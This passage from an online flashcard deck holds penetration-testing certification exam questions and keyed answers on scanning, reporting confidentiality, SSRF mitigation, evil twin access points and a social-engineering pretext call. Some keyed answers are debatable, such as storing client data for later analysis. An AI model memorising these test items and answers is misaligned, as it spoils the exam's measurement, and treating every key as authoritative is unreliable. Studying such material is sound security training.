C. Publish the findings after the client reviews the report.
D. Encrypt and store any client information for future analysis.

A

D. Encrypt and store any client information for future analysis.

89
Q

A penetration tester is required to perform a vulnerability scan that reduces the likelihood of false positives and increases the true positives of the results. Which of the following would MOST likely accomplish this goal?

A. Using OpenVAS in default mode
B. Using Nessus with credentials
C. Using Nmap as the root user
D. Using OWASP ZAP

A

B. Using Nessus with credentials

90
Q

A client evaluating a penetration testing company requests examples of its work. Which of the following represents the BEST course of action for the penetration testers?

A. Redact identifying information and provide a previous customer’s documentation.
B. Allow the client to only view the information while in secure spaces.
C. Determine which reports are no longer under a period of confidentiality.
D. Provide raw output from penetration testing tools.

A

C. Determine which reports are no longer under a period of confidentiality.

91
Q

Which of the following BEST explains why a penetration tester cannot scan a server that was previously scanned successfully?

A. The IP address is wrong.
B. The server is unreachable.
C. The IP address is on the blocklist.
D. The IP address is on the allow list.

A

C. The IP address is on the blocklist.

92
Q

An exploit developer is coding a script that submits a very large number of small requests to a web server until the server is compromised. The script must examine each response received and compare the data to a large number of strings to determine which data to submit next. Which of the following data structures should the exploit developer use to make the string comparison and determination as efficient as possible?

A. A list
B. A tree
C. A dictionary
D. An array

A

C. A dictionary

93
Q

A penetration tester uncovered a flaw in an online banking web application that allows arbitrary requests to other internal network assets through a server-side request forgery. Which of the following would BEST reduce the risk of attack?

A. Implement multifactor authentication on the web application to prevent unauthorized access of the application.

B. Configure a secret management solution to ensure attackers are not able to gain access to confidential information.

C. Ensure a patch management system is in place to ensure the web server system is hardened.

D. Sanitize and validate all input within the web application to prevent internal resources from being accessed.

E. Ensure that enhanced logging is enabled on the web application to detect the attack.

A

D. Sanitize and validate all input within the web application to prevent internal resources from being accessed.

94
Q

Which of the following actions would BEST explain why a testing team would need to reach out to a customer’s emergency contact during an assessment?

A. To confirm assessment dates
B. To escalate the detection of a prior compromise
C. To submit the weekly status report
D. To announce that testing will begin

A

B. To escalate the detection of a prior compromise

95
Q

An executive needs to use Wi-Fi to connect to the company’s server while traveling. Looking for available Wi-Fi connections, the executive notices an available access point to a hotel chain that is not available where the executive is staying. Which of the following attacks is the executive MOST likely experiencing?

A. Data modification
B. Amplification
C. Captive portal
D. Evil twin

A

D. Evil twin

96
Q

A penetration tester calls an IT employee and pretends to be the financial director of the company. The penetration tester asks the IT employee to reset the financial director’s email password. The penetration tester claims to be at an ongoing, off-site meeting with some investors and needs a presentation file quickly downloaded from the director’s mailbox. Which of following techniques is the penetration tester trying to utilize? (Choose two.)

A. Scarcity
B. Intimidation
C. Authority
D. Consensus
E. Urgency
F. Familiarity

A

C. Authority
E. Urgency

Exam Study Questions 2 (1 decks)

Brainscape helps you reach your goals faster, through stronger study habits.
© 2025 Bold Learning Solutions. Terms and Conditions